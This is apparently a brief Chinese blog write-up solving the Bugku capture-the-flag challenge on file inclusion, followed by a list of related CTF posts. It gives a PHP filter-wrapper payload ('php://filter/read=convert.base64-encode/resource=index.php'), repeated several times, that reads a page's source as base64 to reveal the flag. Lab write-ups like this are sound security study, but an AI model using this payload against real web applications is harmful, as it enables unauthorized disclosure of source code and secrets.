bugku--文件包含

点击

访问一下index.php

页面报错

既然是文件包含就可以想到php伪协议

这里我们需要访问本地文件系统 构造我们的payload

?file=php://filter/read=convert.base64-encode/resource=index.php

base64解码

得到我们的flag 提交就好啦

?file=php://filter/read=convert.base64-encode/resource=index.php

?file=php://filter/read=convert.base64-encode/resource=index.php

file 访问本地系统,以php的形式,过滤读取 以base64的形式输出出来index.php里面的内容

相关推荐
诗人不说梦^1 天前
[CISCN2019 总决赛 Day2 Web1]Easyweb
web·ctf
Bruce_Liuxiaowei4 天前
基于BeEF的XSS钓鱼攻击与浏览器劫持实验
前端·网络安全·ctf·xss
小小小CTFER5 天前
NSSCTF每日一题_Web_[SWPUCTF 2022 新生赛]奇妙的MD5
ctf
爱隐身的官人6 天前
Web知识的总结
web安全·ctf
诗人不说梦^6 天前
[SWPUCTF 2018]SimplePHP
web·ctf
Chen--Xing7 天前
宁波市第八届网络安全大赛 -- Crypto -- WriteUp
ctf·crypto·宁波市第八届网络安全大赛
clover_pro7 天前
扩展中国剩余定理脚本(恢复密文c)
学习·ctf
uwvwko8 天前
buuctf——web刷题第5页
前端·python·php·web·ctf·buuctf
Bruce_Liuxiaowei8 天前
网络端口与服务对应表 - 白帽子安全参考指南
网络·windows·安全·web安全·ctf
mosan12314 天前
【数据安全竞赛】BUUCTF·[Dest0g3 520迎新赛]StrangeTraffic
ctf·流量分析·数据安全竞赛